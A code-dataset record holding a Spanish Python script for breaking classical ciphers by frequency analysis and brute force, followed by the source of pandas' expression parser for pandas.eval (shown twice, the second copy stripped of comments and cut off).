estadisticas_castellano = {'A': 0.1203914356874436, 'B': 0.015130070791165134, 'C': 0.03719184102245509, 'D': 0.05437026585244542, 'E': 0.1386395633977034, 'F': 0.004934755557097172, 'G': 0.01092558720618012, 'H': 0.012658047516610746, 'I': 0.048772133465719646, 'J': 0.006582358140488471, 'K': 8.238012916956494e-05, 'L': 0.05551801306561237, 'M': 0.02788784162203377, 'N': 0.06781866708951004, 'O': 0.09582667220822723, 'P': 0.022245112473652295, 'Q': 0.02013110209127842, 'R': 0.06325617061234451, 'S': 0.07834783863652835, 'T': 0.03919621769909202, 'U': 0.048757887277968516, 'V': 0.011134324826707514, 'W': 0.00016847665514377192, 'X': 0.00025209558324821755, 'Y': 0.015759380650084517, 'Z': 0.004021760742090114}
estadisticas_castellano_esp = {' ': 1, 'A': 0.1203914356874436, 'B': 0.015130070791165134, 'C': 0.03719184102245509, 'D': 0.05437026585244542, 'E': 0.1386395633977034, 'F': 0.004934755557097172, 'G': 0.01092558720618012, 'H': 0.012658047516610746, 'I': 0.048772133465719646, 'J': 0.006582358140488471, 'K': 8.238012916956494e-05, 'L': 0.05551801306561237, 'M': 0.02788784162203377, 'N': 0.06781866708951004, 'O': 0.09582667220822723, 'P': 0.022245112473652295, 'Q': 0.02013110209127842, 'R': 0.06325617061234451, 'S': 0.07834783863652835, 'T': 0.03919621769909202, 'U': 0.048757887277968516, 'V': 0.011134324826707514, 'W': 0.00016847665514377192, 'X': 0.00025209558324821755, 'Y': 0.015759380650084517, 'Z': 0.004021760742090114}
estadisticas_ingles = {'A': 0.0831295411584481, 'B': 0.01738984496652256, 'C': 0.017155136950865266, 'D': 0.052443360917834525, 'E': 0.12285071813081565, 'F': 0.024581248091420035, 'G': 0.02449291711778557, 'H': 0.06476679361089449, 'I': 0.06393143497452282, 'J': 0.0006511254627912083, 'K': 0.009077900347519288, 'L': 0.04530117076396197, 'M': 0.022928197013403595, 'N': 0.06837322107728455, 'O': 0.0779066568745473, 'P': 0.013705181494913397, 'Q': 0.00058677003914324, 'R': 0.05933696247447866, 'S': 0.05987073392944122, 'T': 0.08989443186779629, 'U': 0.02559074493295679, 'V': 0.008983260018625218, 'W': 0.026715072040218356, 'X': 0.000682672239089232, 'Y': 0.019290222770715505, 'Z': 0.00036468073400515346}
with open('t.txt') as f:
t = f.read().replace(' ', '').replace('\n', '')
KEYWORDS = ['CRIP', 'CUANDO', 'EN', 'HA', 'HABIA', 'ERA', 'CONTRA', 'DESDE', 'SOLO', 'PERO', 'LE', 'SI', 'ESTA', 'AHORA', 'ALLI', 'SE', 'SEGUN', 'ANTE', 'SER', 'EL', 'POR', 'PARA', 'TAMBIEN', 'TODO', 'SUS', 'PORQUE', 'AQUI', 'YA', 'HACIA', 'A', 'CON', 'HAN', 'DEL', 'Y', 'AL', 'COMO', 'HASTA', 'QUE', 'O', 'UN', 'BAJO', 'LO', 'MAS', 'SU', 'LOS', 'SIN', 'NO', 'PUEDE', 'DOS', 'ENTRE', 'SOBRE', 'CIFR', 'MI', 'FUE', 'MUY', 'TRAS', 'LAS', 'LA', 'ES', 'SON', 'VEZ', 'ME', 'CABE', 'YO', 'HAY', 'ESTE', 'UNA', 'AÑOS', 'DE']
KEYWORDS_EN = list(set(['THE', 'IS', 'AND', 'WHO', 'HE', 'IT', 'WHERE', 'CRYPT', 'A']))
class Descifrado():
def __init__(self, text, key):
self.text = text
self.key = key
def __str__(self):
return "[%s] %s" % (self.key, self.text)
MAX = 5
def analiza_repetidos(t, i=2):
t = re.sub(r'[^A-Z]', '', t.upper())
res = {}
for j in range(len(t)):
ocur = t[j:j+i]
if len(ocur) < i:
continue
last = t[j:].find(ocur)
while last >= 0:
if ocur in res:
res[ocur].append(j+last)
else:
res[ocur] = [j+last]
n = t[j+last+1:].find(ocur)
if n >= 0:
last += n + 1
else:
last = -1
for x in res:
val = list(set(res[x]))
val.sort()
res[x] = val
return res
def calcula_distancias(v):
dist = []
for x in range(len(v))[1:]:
dist.append(v[x] - v[x-1])
return dist
def divisores(x):
res = []
for i in range(int(x/2))[2:]:
if x % i == 0:
res.append(i)
return res
def analisis_estadistico(txt):
txt = re.sub(r'[^A-Z]', '', txt.upper())
d = {chr(c + ord('A')): 0 for c in range(ord('Z') - ord('A') + 1)}
for x in txt:
if x in d:
d[x] += 1
else:
d[x] = 1
return {x: float(d[x])/len(txt) for x in d}
def gen_keys(cs, n, key):
if len(key) == len(cs):
return [key]
keys = []
for c in cs[n]:
keys += gen_keys(cs, n+1, key + c)
return keys
from math import gcd
def comun_divisor(values):
res = values[0]
for v in values[1:]:
aux = gcd(res, v)
if aux <= 2:
return res
res = aux
return res
def repetidos(t):
res = {}
for x in range(len(t) - 1):
if t[x] == t[x+1]:
c = t[x:x+1]
if c in res:
res[c].append(x)
else:
res[c] = [x]
return res
def representa_matrix(t, n=10):
res = ""
for i in range(len(t)):
if i % n == 0 and i > 0:
res += "\n"
res += "%c " % t[i]
return res
def translate(t, translations, n=1):
res = ""
while len(t):
c = t[:n]
t = t[n:]
res += translations.get(c, " ")
return res
def gen_translations(translations, translation):
translation_aux = {k: translation[k] for k in translation}
if len(translations) == 0:
r = translate(t, translation, n=n_gram)
trans_res.append(Descifrado(r, translation))
return
ts = translations.keys()
for i in ts:
ts_values = translations[i]
for j in ts_values:
translation_aux[i] = j
next = {k: translations[k] for k in translations if k!=i}
gen_translations(next, translation_aux)
break
english = False
def most_able(candidates, KEYWORDS=[]):
res = {}
for c in candidates:
kws = 0
for keyword in KEYWORDS:
if keyword in c.text:
kws += 1
if english:
for keyword in KEYWORDS_EN:
if keyword in c.text:
kws += 1
res[c] = kws
return {x[0]: x[1] for x in sorted(res.items(), key=lambda x: (x[1],x[0].text))[::-1]}
from entro import entropy
e = entropy(t)
multigram = False
if multigram:
print("ANÁLISIS POLIALFABÉTICO")
n_gram = int(input("Ngram > "))
else:
print("- ANÁLISIS MONOALFABÉTICO:")
n_gram = 1
ar = analiza_repetidos(t, i=n_gram)
d = {x: len(ar[x]) for x in ar}
estadisticas = {x[0]: x[1] for x in sorted(d.items(), key=lambda x: (x[1],x[0]))[::-1]}
conv_estadisticas_es = {x[0]: x[1] for x in sorted(estadisticas_castellano.items(), key=lambda x: (x[1],x[0]))[::-1]}
conv_estadisticas_en = {x[0]: x[1] for x in sorted(estadisticas_ingles.items(), key=lambda x: (x[1],x[0]))[::-1]}
r_std = [v for i, v in enumerate(estadisticas)]
r_mix_es = [v for i, v in enumerate(conv_estadisticas_es)]
r_mix_en = [v for i, v in enumerate(conv_estadisticas_en)]
translations = {r_std[i]: [r_mix_es[i]] for i in range(min(len(r_std), len(r_mix_es)))}
if english:
for i in range(min(len(r_std), len(r_mix_en))):
c = r_mix_en[i]
tr = r_std[i]
if c in translations:
translations[tr].append(c)
else:
translations[tr] = [c]
rep = repetidos(t)
add_rep = True and (n_gram == 1)
if add_rep:
for d in rep:
translations[d].append('L')
translations[d].append('R')
dup = analiza_repetidos(t, i=2)
add_dup = False and (n_gram == 1)
if add_dup:
for r in dup:
translations[r[0]].append('C')
translations[r[1]].append('H')
mat = representa_matrix(t, n = 20)
def unifica(translations):
for x in translations:
translations[x] = list(set(translations[x]))
return translations
translations = unifica(translations)
print()
print("[*] Mensaje:")
print(t)
print()
print("[*] Entropía: %f" % e)
print()
print("[*] Estadísticas:")
print(estadisticas)
print()
print("[*] Repetidos (RR, LL):")
print(rep)
print()
print("[*] Parejas repetidas:")
print(dup)
print()
print("[*] Matriz:")
print(mat)
print()
print("[*] Traducciones")
print(translations)
claves = 1
for i in translations:
v = translations[i]
claves *= len(v) if len(v) > 0 else 1
print()
print("[*] Claves posibles: %d" % claves)
trans_res = []
gen_translations(translations, {})
stat = most_able(trans_res, KEYWORDS=KEYWORDS)
affine_values = dict(a=[], b=[])
print()
print('-[CODEBOOK BY CRYPTOANALYSIS]')
n_best = 3
for k in stat:
if n_best:
m = k.text
print("[%d] %s" % (stat[k], k))
broken = affine_break(m[0], m[1], t[0], t[1])
affine_values['a'].append(broken['a'])
affine_values['b'].append(broken['b'])
else:
break
n_best -= 1
affine_values['a'] = list(set(affine_values['a']))
affine_values['b'] = list(set(affine_values['b']))
affines = []
for a in affine_values['a']:
for b in affine_values['b']:
aux = decode_affine(t, a, b)
        affines.append(Descifrado(aux, dict(a=a, b=b)))
print()
print('-[AFFINE BY CRYPTOANALYSIS]')
n_best = 3
for x in most_able(affines, KEYWORDS=KEYWORDS):
if n_best:
print("%s" % x)
else:
break
n_best -= 1
others = True
if others:
print()
print("-[AFFINE BRUTEFORCE]")
affines = []
for i in range(26):
for j in range(26):
aux = decode_affine(t, i, j)
affines.append(Descifrado(aux, dict(a=i, b=j)))
n_best = 3
for x in most_able(affines, KEYWORDS=KEYWORDS):
if n_best:
print("%s" % x)
else:
break
n_best -= 1
from cesar import cesar
print()
print("-[CESAR BRUTEFORCE]")
cesars = []
for i in range(26):
cesars.append(Descifrado(cesar(i, t), dict(rot=i)))
stat = most_able(cesars, KEYWORDS=KEYWORDS)
n_best = 3
for k in stat:
if n_best:
print("%s" % (k))
else:
break
n_best -= 1
print()
print("-[ATBASH]")
letras = [chr(x + ord('A')) for x in range(ord('Z') - ord('A') + 1)]
atbash_code = letras[::-1]
def atbash(t):
res = ""
for x in t:
res += atbash_code[letras.index(x)]
return res
print("%s" % atbash(t))
| true
| true
|
1c40dc99308567bada224c8e4e4b3fd6b5c6906b
| 22,556
|
py
|
Python
|
pandas/computation/expr.py
|
clarkfitzg/pandas
|
a71ede374a019ea40321d8c1cfd13258b45ff58d
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
pandas/computation/expr.py
|
clarkfitzg/pandas
|
a71ede374a019ea40321d8c1cfd13258b45ff58d
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
pandas/computation/expr.py
|
clarkfitzg/pandas
|
a71ede374a019ea40321d8c1cfd13258b45ff58d
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
""":func:`~pandas.eval` parsers
"""
import ast
import operator
import sys
import inspect
import tokenize
import datetime
from functools import partial
import pandas as pd
from pandas import compat
from pandas.compat import StringIO, lmap, zip, reduce, string_types
from pandas.core.base import StringMixin
from pandas.core import common as com
from pandas.tools.util import compose
from pandas.computation.ops import (_cmp_ops_syms, _bool_ops_syms,
_arith_ops_syms, _unary_ops_syms, is_term)
from pandas.computation.ops import _reductions, _mathops, _LOCAL_TAG
from pandas.computation.ops import Op, BinOp, UnaryOp, Term, Constant, Div
from pandas.computation.ops import UndefinedVariableError
from pandas.computation.scope import Scope, _ensure_scope
def tokenize_string(source):
"""Tokenize a Python source code string.
Parameters
----------
source : str
A Python source code string
"""
line_reader = StringIO(source).readline
for toknum, tokval, _, _, _ in tokenize.generate_tokens(line_reader):
yield toknum, tokval
def _rewrite_assign(tok):
"""Rewrite the assignment operator for PyTables expressions that use ``=``
as a substitute for ``==``.
Parameters
----------
tok : tuple of int, str
ints correspond to the all caps constants in the tokenize module
Returns
-------
t : tuple of int, str
        Either the input token or the replacement values
"""
toknum, tokval = tok
return toknum, '==' if tokval == '=' else tokval
def _replace_booleans(tok):
"""Replace ``&`` with ``and`` and ``|`` with ``or`` so that bitwise
precedence is changed to boolean precedence.
Parameters
----------
tok : tuple of int, str
ints correspond to the all caps constants in the tokenize module
Returns
-------
t : tuple of int, str
        Either the input token or the replacement values
"""
toknum, tokval = tok
if toknum == tokenize.OP:
if tokval == '&':
return tokenize.NAME, 'and'
elif tokval == '|':
return tokenize.NAME, 'or'
return toknum, tokval
return toknum, tokval
def _replace_locals(tok):
"""Replace local variables with a syntactically valid name.
Parameters
----------
tok : tuple of int, str
ints correspond to the all caps constants in the tokenize module
Returns
-------
t : tuple of int, str
        Either the input token or the replacement values
Notes
-----
This is somewhat of a hack in that we rewrite a string such as ``'@a'`` as
``'__pd_eval_local_a'`` by telling the tokenizer that ``__pd_eval_local_``
is a ``tokenize.OP`` and to replace the ``'@'`` symbol with it.
"""
toknum, tokval = tok
if toknum == tokenize.OP and tokval == '@':
return tokenize.OP, _LOCAL_TAG
return toknum, tokval
def _preparse(source, f=compose(_replace_locals, _replace_booleans,
_rewrite_assign)):
"""Compose a collection of tokenization functions
Parameters
----------
source : str
A Python source code string
f : callable
This takes a tuple of (toknum, tokval) as its argument and returns a
tuple with the same structure but possibly different elements. Defaults
to the composition of ``_rewrite_assign``, ``_replace_booleans``, and
``_replace_locals``.
Returns
-------
s : str
Valid Python source code
Notes
-----
The `f` parameter can be any callable that takes *and* returns input of the
form ``(toknum, tokval)``, where ``toknum`` is one of the constants from
the ``tokenize`` module and ``tokval`` is a string.
"""
assert callable(f), 'f must be callable'
return tokenize.untokenize(lmap(f, tokenize_string(source)))
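# Minimal sketch (not part of pandas): the default preparser rewrites a
# PyTables-style query into valid boolean Python -- '&'/'|' become
# 'and'/'or' and a bare '=' becomes '=='. Exact whitespace in the result
# depends on tokenize.untokenize.
def _preparse_demo(source="a & b = 1"):
    return _preparse(source)  # e.g. "a and b ==1" (modulo spacing)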
def _is_type(t):
"""Factory for a type checking function of type ``t`` or tuple of types."""
return lambda x: isinstance(x.value, t)
_is_list = _is_type(list)
_is_str = _is_type(string_types)
# partition all AST nodes
_all_nodes = frozenset(filter(lambda x: isinstance(x, type) and
issubclass(x, ast.AST),
(getattr(ast, node) for node in dir(ast))))
def _filter_nodes(superclass, all_nodes=_all_nodes):
"""Filter out AST nodes that are subclasses of ``superclass``."""
node_names = (node.__name__ for node in all_nodes
if issubclass(node, superclass))
return frozenset(node_names)
_all_node_names = frozenset(map(lambda x: x.__name__, _all_nodes))
_mod_nodes = _filter_nodes(ast.mod)
_stmt_nodes = _filter_nodes(ast.stmt)
_expr_nodes = _filter_nodes(ast.expr)
_expr_context_nodes = _filter_nodes(ast.expr_context)
_slice_nodes = _filter_nodes(ast.slice)
_boolop_nodes = _filter_nodes(ast.boolop)
_operator_nodes = _filter_nodes(ast.operator)
_unary_op_nodes = _filter_nodes(ast.unaryop)
_cmp_op_nodes = _filter_nodes(ast.cmpop)
_comprehension_nodes = _filter_nodes(ast.comprehension)
_handler_nodes = _filter_nodes(ast.excepthandler)
_arguments_nodes = _filter_nodes(ast.arguments)
_keyword_nodes = _filter_nodes(ast.keyword)
_alias_nodes = _filter_nodes(ast.alias)
# nodes that we don't support directly but are needed for parsing
_hacked_nodes = frozenset(['Assign', 'Module', 'Expr'])
_unsupported_expr_nodes = frozenset(['Yield', 'GeneratorExp', 'IfExp',
'DictComp', 'SetComp', 'Repr', 'Lambda',
'Set', 'AST', 'Is', 'IsNot'])
# these nodes are low priority or won't ever be supported (e.g., AST)
_unsupported_nodes = ((_stmt_nodes | _mod_nodes | _handler_nodes |
_arguments_nodes | _keyword_nodes | _alias_nodes |
_expr_context_nodes | _unsupported_expr_nodes) -
_hacked_nodes)
# in some cases we rewrite assignment to an equality comparison, and we
# don't want `stmt` and friends in there, so keep only the classes whose
# names are capitalized
_base_supported_nodes = (_all_node_names - _unsupported_nodes) | _hacked_nodes
_msg = 'cannot both support and not support {0}'.format(_unsupported_nodes &
_base_supported_nodes)
assert not _unsupported_nodes & _base_supported_nodes, _msg
def _node_not_implemented(node_name, cls):
"""Return a function that raises a NotImplementedError with a passed node
name.
"""
def f(self, *args, **kwargs):
raise NotImplementedError("{0!r} nodes are not "
"implemented".format(node_name))
return f
def disallow(nodes):
"""Decorator to disallow certain nodes from parsing. Raises a
NotImplementedError instead.
Returns
-------
disallowed : callable
"""
def disallowed(cls):
cls.unsupported_nodes = ()
for node in nodes:
new_method = _node_not_implemented(node, cls)
name = 'visit_{0}'.format(node)
cls.unsupported_nodes += (name,)
setattr(cls, name, new_method)
return cls
return disallowed
def _op_maker(op_class, op_symbol):
"""Return a function to create an op class with its symbol already passed.
Returns
-------
f : callable
"""
def f(self, node, *args, **kwargs):
"""Return a partial function with an Op subclass with an operator
already passed.
Returns
-------
f : callable
"""
return partial(op_class, op_symbol, *args, **kwargs)
return f
_op_classes = {'binary': BinOp, 'unary': UnaryOp}
def add_ops(op_classes):
"""Decorator to add default implementation of ops."""
def f(cls):
for op_attr_name, op_class in compat.iteritems(op_classes):
ops = getattr(cls, '{0}_ops'.format(op_attr_name))
ops_map = getattr(cls, '{0}_op_nodes_map'.format(op_attr_name))
for op in ops:
op_node = ops_map[op]
if op_node is not None:
made_op = _op_maker(op_class, op)
setattr(cls, 'visit_{0}'.format(op_node), made_op)
return cls
return f
@disallow(_unsupported_nodes)
@add_ops(_op_classes)
class BaseExprVisitor(ast.NodeVisitor):
"""Custom ast walker. Parsers of other engines should subclass this class
if necessary.
Parameters
----------
env : Scope
engine : str
parser : str
preparser : callable
"""
const_type = Constant
term_type = Term
binary_ops = _cmp_ops_syms + _bool_ops_syms + _arith_ops_syms
binary_op_nodes = ('Gt', 'Lt', 'GtE', 'LtE', 'Eq', 'NotEq', 'In', 'NotIn',
'BitAnd', 'BitOr', 'And', 'Or', 'Add', 'Sub', 'Mult',
None, 'Pow', 'FloorDiv', 'Mod')
binary_op_nodes_map = dict(zip(binary_ops, binary_op_nodes))
unary_ops = _unary_ops_syms
unary_op_nodes = 'UAdd', 'USub', 'Invert', 'Not'
unary_op_nodes_map = dict(zip(unary_ops, unary_op_nodes))
rewrite_map = {
ast.Eq: ast.In,
ast.NotEq: ast.NotIn,
ast.In: ast.In,
ast.NotIn: ast.NotIn
}
def __init__(self, env, engine, parser, preparser=_preparse):
self.env = env
self.engine = engine
self.parser = parser
self.preparser = preparser
self.assigner = None
def visit(self, node, **kwargs):
if isinstance(node, string_types):
clean = self.preparser(node)
node = ast.fix_missing_locations(ast.parse(clean))
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method)
return visitor(node, **kwargs)
def visit_Module(self, node, **kwargs):
if len(node.body) != 1:
raise SyntaxError('only a single expression is allowed')
expr = node.body[0]
return self.visit(expr, **kwargs)
def visit_Expr(self, node, **kwargs):
return self.visit(node.value, **kwargs)
def _rewrite_membership_op(self, node, left, right):
# the kind of the operator (is actually an instance)
op_instance = node.op
op_type = type(op_instance)
# must be two terms and the comparison operator must be ==/!=/in/not in
if is_term(left) and is_term(right) and op_type in self.rewrite_map:
left_list, right_list = map(_is_list, (left, right))
left_str, right_str = map(_is_str, (left, right))
# if there are any strings or lists in the expression
if left_list or right_list or left_str or right_str:
op_instance = self.rewrite_map[op_type]()
# pop the string variable out of locals and replace it with a list
# of one string, kind of a hack
if right_str:
self.env.remove_tmp(right.name)
name = self.env.add_tmp([right.value])
right = self.term_type(name, self.env)
if left_str:
self.env.remove_tmp(left.name)
name = self.env.add_tmp([left.value])
left = self.term_type(name, self.env)
op = self.visit(op_instance)
return op, op_instance, left, right
def _possibly_transform_eq_ne(self, node, left=None, right=None):
if left is None:
left = self.visit(node.left, side='left')
if right is None:
right = self.visit(node.right, side='right')
op, op_class, left, right = self._rewrite_membership_op(node, left,
right)
return op, op_class, left, right
def _possibly_eval(self, binop, eval_in_python):
# eval `in` and `not in` (for now) in "partial" python space
# things that can be evaluated in "eval" space will be turned into
# temporary variables. for example,
# [1,2] in a + 2 * b
# in that case a + 2 * b will be evaluated using numexpr, and the "in"
# call will be evaluated using isin (in python space)
return binop.evaluate(self.env, self.engine, self.parser,
self.term_type, eval_in_python)
def _possibly_evaluate_binop(self, op, op_class, lhs, rhs,
eval_in_python=('in', 'not in'),
maybe_eval_in_python=('==', '!=', '<', '>',
'<=', '>=')):
res = op(lhs, rhs)
if self.engine != 'pytables':
            if (res.op in _cmp_ops_syms
                    and (getattr(lhs, 'is_datetime', False)
                         or getattr(rhs, 'is_datetime', False))):
                # all date ops must be done in python because numexpr doesn't
                # work well with NaT
return self._possibly_eval(res, self.binary_ops)
if res.op in eval_in_python:
# "in"/"not in" ops are always evaluated in python
return self._possibly_eval(res, eval_in_python)
elif self.engine != 'pytables':
if (getattr(lhs, 'return_type', None) == object
or getattr(rhs, 'return_type', None) == object):
# evaluate "==" and "!=" in python if either of our operands
# has an object return type
return self._possibly_eval(res, eval_in_python +
maybe_eval_in_python)
return res
def visit_BinOp(self, node, **kwargs):
op, op_class, left, right = self._possibly_transform_eq_ne(node)
return self._possibly_evaluate_binop(op, op_class, left, right)
def visit_Div(self, node, **kwargs):
truediv = self.env.scope['truediv']
return lambda lhs, rhs: Div(lhs, rhs, truediv)
def visit_UnaryOp(self, node, **kwargs):
op = self.visit(node.op)
operand = self.visit(node.operand)
return op(operand)
def visit_Name(self, node, **kwargs):
return self.term_type(node.id, self.env, **kwargs)
def visit_NameConstant(self, node, **kwargs):
return self.const_type(node.value, self.env)
def visit_Num(self, node, **kwargs):
return self.const_type(node.n, self.env)
def visit_Str(self, node, **kwargs):
name = self.env.add_tmp(node.s)
return self.term_type(name, self.env)
def visit_List(self, node, **kwargs):
name = self.env.add_tmp([self.visit(e).value for e in node.elts])
return self.term_type(name, self.env)
visit_Tuple = visit_List
def visit_Index(self, node, **kwargs):
""" df.index[4] """
return self.visit(node.value)
def visit_Subscript(self, node, **kwargs):
value = self.visit(node.value)
slobj = self.visit(node.slice)
result = pd.eval(slobj, local_dict=self.env, engine=self.engine,
parser=self.parser)
try:
# a Term instance
v = value.value[result]
except AttributeError:
# an Op instance
lhs = pd.eval(value, local_dict=self.env, engine=self.engine,
parser=self.parser)
v = lhs[result]
name = self.env.add_tmp(v)
return self.term_type(name, env=self.env)
def visit_Slice(self, node, **kwargs):
""" df.index[slice(4,6)] """
lower = node.lower
if lower is not None:
lower = self.visit(lower).value
upper = node.upper
if upper is not None:
upper = self.visit(upper).value
step = node.step
if step is not None:
step = self.visit(step).value
return slice(lower, upper, step)
def visit_Assign(self, node, **kwargs):
"""
support a single assignment node, like
c = a + b
set the assigner at the top level, must be a Name node which
might or might not exist in the resolvers
"""
if len(node.targets) != 1:
raise SyntaxError('can only assign a single expression')
if not isinstance(node.targets[0], ast.Name):
raise SyntaxError('left hand side of an assignment must be a '
'single name')
if self.env.target is None:
raise ValueError('cannot assign without a target object')
try:
assigner = self.visit(node.targets[0], **kwargs)
except UndefinedVariableError:
assigner = node.targets[0].id
self.assigner = getattr(assigner, 'name', assigner)
if self.assigner is None:
raise SyntaxError('left hand side of an assignment must be a '
'single resolvable name')
return self.visit(node.value, **kwargs)
def visit_Attribute(self, node, **kwargs):
attr = node.attr
value = node.value
ctx = node.ctx
if isinstance(ctx, ast.Load):
# resolve the value
resolved = self.visit(value).value
try:
v = getattr(resolved, attr)
name = self.env.add_tmp(v)
return self.term_type(name, self.env)
except AttributeError:
# something like datetime.datetime where scope is overridden
if isinstance(value, ast.Name) and value.id == attr:
return resolved
raise ValueError("Invalid Attribute context {0}".format(ctx.__name__))
def visit_Call(self, node, side=None, **kwargs):
# this can happen with: datetime.datetime
if isinstance(node.func, ast.Attribute):
res = self.visit_Attribute(node.func)
elif not isinstance(node.func, ast.Name):
raise TypeError("Only named functions are supported")
else:
res = self.visit(node.func)
if res is None:
raise ValueError("Invalid function call {0}".format(node.func.id))
if hasattr(res, 'value'):
res = res.value
args = [self.visit(targ).value for targ in node.args]
if node.starargs is not None:
args += self.visit(node.starargs).value
keywords = {}
for key in node.keywords:
if not isinstance(key, ast.keyword):
raise ValueError("keyword error in function call "
"'{0}'".format(node.func.id))
keywords[key.arg] = self.visit(key.value).value
if node.kwargs is not None:
keywords.update(self.visit(node.kwargs).value)
return self.const_type(res(*args, **keywords), self.env)
def translate_In(self, op):
return op
def visit_Compare(self, node, **kwargs):
ops = node.ops
comps = node.comparators
# base case: we have something like a CMP b
if len(comps) == 1:
op = self.translate_In(ops[0])
binop = ast.BinOp(op=op, left=node.left, right=comps[0])
return self.visit(binop)
# recursive case: we have a chained comparison, a CMP b CMP c, etc.
left = node.left
values = []
for op, comp in zip(ops, comps):
new_node = self.visit(ast.Compare(comparators=[comp], left=left,
ops=[self.translate_In(op)]))
left = comp
values.append(new_node)
return self.visit(ast.BoolOp(op=ast.And(), values=values))
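    # Note: visit_Compare above expands a chained comparison such as
    # 'a < b < c' into the conjunction '(a < b) and (b < c)' via ast.BoolOp,
    # matching Python's comparison-chaining semantics.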
def _try_visit_binop(self, bop):
if isinstance(bop, (Op, Term)):
return bop
return self.visit(bop)
def visit_BoolOp(self, node, **kwargs):
def visitor(x, y):
lhs = self._try_visit_binop(x)
rhs = self._try_visit_binop(y)
op, op_class, lhs, rhs = self._possibly_transform_eq_ne(node, lhs,
rhs)
return self._possibly_evaluate_binop(op, node.op, lhs, rhs)
operands = node.values
return reduce(visitor, operands)
_python_not_supported = frozenset(['Dict', 'Call', 'BoolOp', 'In', 'NotIn'])
_numexpr_supported_calls = frozenset(_reductions + _mathops)
@disallow((_unsupported_nodes | _python_not_supported) -
(_boolop_nodes | frozenset(['BoolOp', 'Attribute', 'In', 'NotIn',
'Tuple'])))
class PandasExprVisitor(BaseExprVisitor):
def __init__(self, env, engine, parser,
preparser=partial(_preparse, f=compose(_replace_locals,
_replace_booleans))):
super(PandasExprVisitor, self).__init__(env, engine, parser, preparser)
@disallow(_unsupported_nodes | _python_not_supported | frozenset(['Not']))
class PythonExprVisitor(BaseExprVisitor):
def __init__(self, env, engine, parser, preparser=lambda x: x):
super(PythonExprVisitor, self).__init__(env, engine, parser,
preparser=preparser)
class Expr(StringMixin):
"""Object encapsulating an expression.
Parameters
----------
expr : str
engine : str, optional, default 'numexpr'
parser : str, optional, default 'pandas'
env : Scope, optional, default None
truediv : bool, optional, default True
level : int, optional, default 2
"""
def __init__(self, expr, engine='numexpr', parser='pandas', env=None,
truediv=True, level=0):
self.expr = expr
self.env = env or Scope(level=level + 1)
self.engine = engine
self.parser = parser
self.env.scope['truediv'] = truediv
self._visitor = _parsers[parser](self.env, self.engine, self.parser)
self.terms = self.parse()
@property
def assigner(self):
return getattr(self._visitor, 'assigner', None)
def __call__(self):
return self.terms(self.env)
def __unicode__(self):
return com.pprint_thing(self.terms)
def __len__(self):
return len(self.expr)
def parse(self):
"""Parse an expression"""
return self._visitor.visit(self.expr)
@property
def names(self):
"""Get the names in an expression"""
if is_term(self.terms):
return frozenset([self.terms.name])
return frozenset(term.name for term in com.flatten(self.terms))
_parsers = {'python': PythonExprVisitor, 'pandas': PandasExprVisitor}
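# Minimal usage sketch (illustrative; assumes variables 'a' and 'b' exist in
# the calling scope so the Term lookups resolve):
#
#   ex = Expr("a + b * 2", engine='numexpr', parser='pandas')
#   result = ex()        # evaluate the parsed terms against the scope
#   ex.names             # frozenset({'a', 'b'})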
| 34.175758
| 79
| 0.601702
|
import ast
import operator
import sys
import inspect
import tokenize
import datetime
from functools import partial
import pandas as pd
from pandas import compat
from pandas.compat import StringIO, lmap, zip, reduce, string_types
from pandas.core.base import StringMixin
from pandas.core import common as com
from pandas.tools.util import compose
from pandas.computation.ops import (_cmp_ops_syms, _bool_ops_syms,
_arith_ops_syms, _unary_ops_syms, is_term)
from pandas.computation.ops import _reductions, _mathops, _LOCAL_TAG
from pandas.computation.ops import Op, BinOp, UnaryOp, Term, Constant, Div
from pandas.computation.ops import UndefinedVariableError
from pandas.computation.scope import Scope, _ensure_scope
def tokenize_string(source):
line_reader = StringIO(source).readline
for toknum, tokval, _, _, _ in tokenize.generate_tokens(line_reader):
yield toknum, tokval
def _rewrite_assign(tok):
toknum, tokval = tok
return toknum, '==' if tokval == '=' else tokval
def _replace_booleans(tok):
toknum, tokval = tok
if toknum == tokenize.OP:
if tokval == '&':
return tokenize.NAME, 'and'
elif tokval == '|':
return tokenize.NAME, 'or'
return toknum, tokval
return toknum, tokval
def _replace_locals(tok):
toknum, tokval = tok
if toknum == tokenize.OP and tokval == '@':
return tokenize.OP, _LOCAL_TAG
return toknum, tokval
def _preparse(source, f=compose(_replace_locals, _replace_booleans,
_rewrite_assign)):
assert callable(f), 'f must be callable'
return tokenize.untokenize(lmap(f, tokenize_string(source)))
def _is_type(t):
return lambda x: isinstance(x.value, t)
_is_list = _is_type(list)
_is_str = _is_type(string_types)
_all_nodes = frozenset(filter(lambda x: isinstance(x, type) and
issubclass(x, ast.AST),
(getattr(ast, node) for node in dir(ast))))
def _filter_nodes(superclass, all_nodes=_all_nodes):
node_names = (node.__name__ for node in all_nodes
if issubclass(node, superclass))
return frozenset(node_names)
_all_node_names = frozenset(map(lambda x: x.__name__, _all_nodes))
_mod_nodes = _filter_nodes(ast.mod)
_stmt_nodes = _filter_nodes(ast.stmt)
_expr_nodes = _filter_nodes(ast.expr)
_expr_context_nodes = _filter_nodes(ast.expr_context)
_slice_nodes = _filter_nodes(ast.slice)
_boolop_nodes = _filter_nodes(ast.boolop)
_operator_nodes = _filter_nodes(ast.operator)
_unary_op_nodes = _filter_nodes(ast.unaryop)
_cmp_op_nodes = _filter_nodes(ast.cmpop)
_comprehension_nodes = _filter_nodes(ast.comprehension)
_handler_nodes = _filter_nodes(ast.excepthandler)
_arguments_nodes = _filter_nodes(ast.arguments)
_keyword_nodes = _filter_nodes(ast.keyword)
_alias_nodes = _filter_nodes(ast.alias)
_hacked_nodes = frozenset(['Assign', 'Module', 'Expr'])
_unsupported_expr_nodes = frozenset(['Yield', 'GeneratorExp', 'IfExp',
'DictComp', 'SetComp', 'Repr', 'Lambda',
'Set', 'AST', 'Is', 'IsNot'])
# these nodes are low priority or won't ever be supported (e.g., AST)
_unsupported_nodes = ((_stmt_nodes | _mod_nodes | _handler_nodes |
_arguments_nodes | _keyword_nodes | _alias_nodes |
_expr_context_nodes | _unsupported_expr_nodes) -
_hacked_nodes)
# we don't want `stmt` and friends in there, so keep only the supported node
# names (plus the few 'hacked' nodes above)
